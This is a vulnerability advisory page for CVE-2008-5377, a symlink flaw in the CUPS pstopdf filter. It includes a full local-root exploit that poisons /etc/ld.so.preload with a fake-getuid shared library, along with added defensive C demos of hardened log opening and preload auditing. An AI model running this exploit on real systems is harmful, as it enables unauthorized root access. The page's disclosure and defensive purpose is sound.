CUPS 'pstopdf' Symlink Attack Vulnerability

Vulnerability ID: 1117108    Type: Link Following (symlink attack)
Published: 2008-12-22    Updated: 2009-01-12
CVE: CVE-2008-5377    CNNVD ID: CNNVD-200812-101
Platform: Multiple    CVSS score: 6.9
|Sources
https://www.exploit-db.com/exploits/7550
https://www.securityfocus.com/bid/32745
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-101
|Details
The Common Unix Printing System (CUPS) is a cross-platform printing solution for Unix-like systems. It is built on the Internet Printing Protocol (IPP) and drives most PostScript and raster printers. The pstopdf filter in CUPS 1.3.8 writes its log to the fixed, predictable path /tmp/pstopdf.log and does not check whether that path is already a symlink, so a local user who plants a symlink there can make the filter, with whatever privileges it runs under, overwrite or append to an arbitrary file. This is a different issue from CVE-2001-1333.
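As an added example (not code from the original advisory or from CUPS), the following C program replays the vulnerable pattern beside a hardened one: a log opener that uses a fixed path and follows whatever is already there, and one that opens with O_NOFOLLOW and then verifies with fstat() that it holds a regular file it owns. All paths are constructed under a private directory created with mkdtemp() so the demo runs unprivileged and offline; the file names and the log line are assumptions for illustration, not CUPS's own.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a privileged filter opens a fixed,
 * predictable path in /tmp for append. open() follows whatever is already
 * at that path, so a planted symlink redirects the write. */
int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
}

/* Hardened variant: O_NOFOLLOW makes open() fail with ELOOP when the final
 * component is a symlink, and the post-open fstat() confirms we hold a
 * regular file that we own with no other hard links. Avoiding a fixed name
 * in /tmp altogether (mkstemp(), or a directory only the filter user can
 * write) is better still; this is the minimal fix for an existing path. */
int open_log_safe(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)
        || st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Replays the attack in a fresh private directory (all paths constructed
 * for this demo): the attacker plants pstopdf.log -> target, then the
 * "filter" logs one line through each opener. Returns 1 when the unsafe
 * open appended the line to target and the safe open refused with ELOOP
 * without touching target; 0 otherwise. */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/cve-2008-5377-demo.XXXXXX";
    char target[300], link[300];
    const char line[] = "( /tmp/getuid.so ) CVE-2008-5377\n";
    const ssize_t n = (ssize_t)strlen(line);
    struct stat st;
    int fd, ok = 1;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/pstopdf.log", dir);

    /* Victim-owned file the attacker wants written to (think ld.so.preload). */
    fd = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return 0;
    close(fd);
    /* Attacker plants the symlink at the predictable log path. */
    if (symlink(target, link) != 0)
        return 0;

    /* Vulnerable filter: the log line lands in the symlink's target. */
    fd = open_log_unsafe(link);
    if (fd < 0 || write(fd, line, n) != n)
        ok = 0;
    if (fd >= 0)
        close(fd);
    if (stat(target, &st) != 0 || st.st_size != (off_t)n)
        ok = 0;

    /* Fixed filter: open fails with ELOOP and target is unchanged. */
    fd = open_log_safe(link);
    if (fd >= 0) {
        close(fd);
        ok = 0;
    } else if (errno != ELOOP) {
        ok = 0;
    }
    if (stat(target, &st) != 0 || st.st_size != (off_t)n)
        ok = 0;

    unlink(link);
    unlink(target);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("unsafe open followed the symlink and safe open refused: %s\n",
           demo_symlink_attack() ? "yes" : "no");
    return 0;
}
```

Run it as any user: the demo reports success only if the unsafe open grew the symlink target while the safe open returned -1 with errno set to ELOOP and left the target untouched. Note that a kernel with fs.protected_symlinks enabled blocks the original /tmp case for a root-owned follower, but the demo's private directory is neither sticky nor world-writable, so the comparison stays visible even there.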
|Exploit (PoC)
/*
 * cve-2008-5377.c
 *
 * CUPS < 1.3.8-4 pstopdf filter exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * 
 * Usage:
 *
 *   $ gcc cve-2008-5377.c -o cve-2008-5377
 *   $ ./cve-2008-5377
 *   $ id
 *   uid=0(root) gid=1000(vm) ...
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
 *
 *   pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
 *   a symlink attack on the /tmp/pstopdf.log temporary file.
 *
 * Operation:
 *
 *   The exploit creates and prints a malformed postscript document that will
 *   cause the CUPS pstopdf filter to write an error message out to its log 
 *   file that contains the string /tmp/getuid.so.  However, since we also 
 *   symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the 
 *   error message and malicious shared library path will be appended to the
 *   ld.so.preload file, allowing us to elevate privileges to root.
 *
 * Note:
 * 
 *   This exploit only works under the (rare) conditions that cupsd executes 
 *   external filters as a privileged user and a printer on the system uses 
 *   the pstopdf filter (e.g. the pdf.ppd PDF converter). Also,
 *   /etc/ld.so.preload must be world readable.
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

int
main(void)
{
	int ret;
	FILE *fp;
	struct stat log;

	/* Malformed PostScript: a string literal naming the shared object,
	 * followed by an undefined operator, so pstopdf writes an error
	 * message containing /tmp/getuid.so to its log file. */
	fp = fopen("/tmp/cve-2008-5377.ps", "w");
	if(!fp) {
		printf("error: cannot open /tmp/cve-2008-5377.ps\n");
		goto cleanup;
	}
	fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
	fclose(fp);

	/* Shared object to be preloaded: makes getuid() report root. */
	fp = fopen("/tmp/getuid.c", "w");
	if(!fp) {
		printf("error: cannot open /tmp/getuid.c\n");
		goto cleanup;
	}
	fprintf(fp, "int getuid(){return 0;}\n");
	fclose(fp);

	ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
	if (WEXITSTATUS(ret) != 0) {
		printf("error: cannot compile /tmp/getuid.c\n");
		goto cleanup;
	}

	/* The log path must not exist yet, otherwise symlink() below fails. */
	unlink("/tmp/pstopdf.log");
	ret = stat("/tmp/pstopdf.log", &log);
	if (ret != -1) {
		printf("error: /tmp/pstopdf.log already exists\n");
		goto cleanup;
	}

	/* Plant the symlink: the filter's log writes now go to ld.so.preload. */
	ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
	if (ret == -1) {
		printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
		goto cleanup;
	}

	/* Submit the job; the privileged pstopdf filter performs the write. */
	ret = system("lp < /tmp/cve-2008-5377.ps");
	if (WEXITSTATUS(ret) != 0) {
		printf("error: could not print /tmp/cve-2008-5377.ps\n");
		goto cleanup;
	}

cleanup:
	unlink("/tmp/cve-2008-5377.ps");
	unlink("/tmp/getuid.c");
	return 0;
} 

// milw0rm.com [2008-12-22]
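The exploit works because the dynamic loader does not require /etc/ld.so.preload to contain one clean path per line: glibc's rtld blanks '#' comments to end of line and then splits the file on whitespace and ':', attempting to preload every resulting word. A filter error line that merely contains /tmp/getuid.so is therefore enough. As an added example (not part of the original exploit or of glibc), the C code below tokenizes preload content the same way and flags words that are not absolute paths under the standard library directories. Both sample file contents are constructed for the demo, and the "ERROR: ..." line is a stand-in, since the page does not show the real pstopdf message text.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample contents. The second line of sample_poisoned stands
 * in for the filter error message the exploit provokes; what matters is
 * that the attacker's library path appears as a whitespace-delimited word. */
static const char sample_clean[] =
    "# libraries preloaded by the distribution\n"
    "/lib/x86_64-linux-gnu/libfakeroot-sysv.so  # trailing comment\n";
static const char sample_poisoned[] =
    "/lib/x86_64-linux-gnu/libfakeroot-sysv.so\n"
    "ERROR: ( /tmp/getuid.so ) CVE-2008-5377\n";

/* Directories a stock system legitimately preloads from (assumption). */
static const char *const trusted_prefixes[] = {
    "/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", NULL
};

/* rtld splits the file on whitespace or ':' and tries to load every word. */
#define PRELOAD_SEPARATORS ": \t\r\n"

/* Copy `content` into `buf`, blanking '#' comments up to the newline the
 * way glibc's rtld does before it tokenizes /etc/ld.so.preload. */
static void strip_comments(const char *content, char *buf, size_t cap)
{
    size_t i, n = strlen(content);
    int in_comment = 0;
    if (n >= cap)
        n = cap - 1;
    for (i = 0; i < n; i++) {
        if (content[i] == '\n')
            in_comment = 0;
        else if (content[i] == '#')
            in_comment = 1;
        buf[i] = in_comment ? ' ' : content[i];
    }
    buf[n] = '\0';
}

/* 1 if a token is an absolute path under a trusted prefix without "/../". */
int preload_token_ok(const char *tok)
{
    if (tok[0] != '/' || strstr(tok, "/../") != NULL)
        return 0;
    for (const char *const *p = trusted_prefixes; *p; p++)
        if (strncmp(tok, *p, strlen(*p)) == 0)
            return 1;
    return 0;
}

/* Number of words the loader would attempt that fail preload_token_ok();
 * 0 means the file looks clean. */
int audit_preload(const char *content)
{
    char buf[4096];
    int bad = 0;
    strip_comments(content, buf, sizeof buf);
    for (char *tok = strtok(buf, PRELOAD_SEPARATORS); tok;
         tok = strtok(NULL, PRELOAD_SEPARATORS))
        if (!preload_token_ok(tok))
            bad++;
    return bad;
}

/* 1 if tokenizing `content` yields exactly `lib`, i.e. the loader would
 * preload that object even though it sits inside a free-form error line. */
int preload_would_load(const char *content, const char *lib)
{
    char buf[4096];
    strip_comments(content, buf, sizeof buf);
    for (char *tok = strtok(buf, PRELOAD_SEPARATORS); tok;
         tok = strtok(NULL, PRELOAD_SEPARATORS))
        if (strcmp(tok, lib) == 0)
            return 1;
    return 0;
}

int main(void)
{
    printf("clean sample: %d suspicious words\n", audit_preload(sample_clean));
    printf("poisoned sample: %d suspicious words, would load /tmp/getuid.so: %d\n",
           audit_preload(sample_poisoned),
           preload_would_load(sample_poisoned, "/tmp/getuid.so"));
    return 0;
}
```

On the poisoned sample the words "ERROR", "(", "/tmp/getuid.so", ")" and "CVE-2008-5377" are all flagged; the loader would report the unloadable ones and still preload /tmp/getuid.so. As a response check, any word in /etc/ld.so.preload that resolves outside the system library directories, or any file at all on a host that does not ship one, is worth treating as a persistence indicator.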
|Affected products
Ubuntu Linux 8.10 (sparc, powerpc, lpia, i386, amd64); Ubuntu Ubuntu L
|References

Source: MILW0RM
Name: 7550
Link: http://www.milw0rm.com/exploits/7550
Source: MISC
Link: http://uvw.ru/report.sid.txt
Source: MLIST
Name: [debian-devel] 20080813 Re: Possible mass bug filing: The possibility of attack with the help of symlinks in some Debian packages
Link: http://lists.debian.org/debian-devel/2008/08/msg00347.html